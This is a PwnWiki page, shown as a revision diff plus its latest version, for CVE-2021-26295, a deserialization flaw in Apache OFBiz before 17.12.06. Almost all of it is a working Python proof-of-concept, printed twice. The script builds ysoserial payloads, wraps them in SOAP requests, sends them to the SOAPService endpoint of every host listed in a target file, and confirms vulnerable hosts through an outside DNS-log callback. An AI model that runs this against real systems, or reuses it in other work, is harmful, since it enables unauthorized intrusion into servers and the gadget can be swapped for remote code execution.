Difference between revisions of "CVE-2021-26295 Apache OFBiz RMI反序列化漏洞"
From PwnWiki
(Marked this version for translation) |
|||
| Line 9: | Line 9: | ||
==POC== | ==POC== | ||
<pre> | <pre> | ||
| + | #coding:utf-8 | ||
| + | import binascii | ||
| + | import os | ||
import requests | import requests | ||
| − | import | + | import urllib3 |
| − | + | import uuid | |
| − | + | urllib3.disable_warnings() | |
| − | import | + | def main(): |
| − | + | id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0] | |
| − | + | if(not os.path.exists("target.txt")): | |
| − | def | + | exit("put url in target.txt! ") |
| − | + | if(not os.path.exists("ysoserial.jar")): | |
| − | + | exit("where is ysoserial.jar?") | |
| − | + | with open("target.txt")as f: | |
| − | + | urls = f.readlines() | |
| − | + | for url in urls: | |
| − | + | url = url.strip() | |
| − | + | uid = uuid.uuid1().hex | |
| − | + | cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id) | |
| − | + | r = os.popen(cmd) | |
| − | + | r.close() | |
| − | + | with open("tmp",'rb') as f: | |
| − | + | payload = binascii.hexlify(f.read()) | |
| − | + | data = ''' | |
| − | + | <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> | |
| − | + | <soapenv:Header/> | |
| − | ' | + | <soapenv:Body> |
| − | + | <ser> | |
| − | + | <map-HashMap> | |
| − | + | <map-Entry> | |
| − | + | <map-Key> | |
| − | + | <cus-obj>{0}</cus-obj> | |
| − | + | </map-Key> | |
| − | + | <map-Value> | |
| − | + | <std-String value="http://baidu.com"/> | |
| − | print(" | + | </map-Value> |
| + | </map-Entry> | ||
| + | </map-HashMap> | ||
| + | </ser> | ||
| + | </soapenv:Body> | ||
| + | </soapenv:Envelope> | ||
| + | '''.format(payload.decode()) | ||
| + | headers = { | ||
| + | "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" | ||
| + | } | ||
| + | url = url+"/webtools/control/SOAPService" | ||
| + | try: | ||
| + | requests.post(url,data=data,verify=False,headers=headers,timeout=5) | ||
| + | requests.post(url,data=data,verify=False,headers=headers,timeout=5) | ||
| + | requests.post(url,data=data,verify=False,headers=headers,timeout=5) | ||
| + | except: | ||
| + | pass | ||
| + | dnslogresurl = "https://dns.xn--9tr.com/"+id | ||
| + | if(uid in requests.get(dnslogresurl).text): | ||
| + | print("[+] {0} 漏洞存在".format(url)) | ||
else: | else: | ||
| − | print(" | + | print("[-] {0} 漏洞不存在".format(url)) |
| − | + | print("[+] 请到 {0} 查看结果".format(dnslogresurl)) | |
| − | |||
| − | |||
| − | |||
| − | |||
| − | if __name__ == | + | if __name__ == "__main__": |
| − | + | main() | |
| − | |||
| − | |||
| − | |||
</pre> | </pre> | ||
Latest revision as of 15:11, 24 March 2021
漏洞影響
Apache OFBiz < 17.12.06
POC
#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
urllib3.disable_warnings()
def main():
id = requests.get("https://dns.xn--9tr.com/new_gen").text.split(".")[0]
if(not os.path.exists("target.txt")):
exit("put url in target.txt! ")
if(not os.path.exists("ysoserial.jar")):
exit("where is ysoserial.jar?")
with open("target.txt")as f:
urls = f.readlines()
for url in urls:
url = url.strip()
uid = uuid.uuid1().hex
cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp".format(uid,id)
r = os.popen(cmd)
r.close()
with open("tmp",'rb') as f:
payload = binascii.hexlify(f.read())
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>{0}</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://baidu.com"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
'''.format(payload.decode())
headers = {
"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
}
url = url+"/webtools/control/SOAPService"
try:
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
requests.post(url,data=data,verify=False,headers=headers,timeout=5)
except:
pass
dnslogresurl = "https://dns.xn--9tr.com/"+id
if(uid in requests.get(dnslogresurl).text):
print("[+] {0} 漏洞存在".format(url))
else:
print("[-] {0} 漏洞不存在".format(url))
print("[+] 请到 {0} 查看结果".format(dnslogresurl))
if __name__ == "__main__":
main()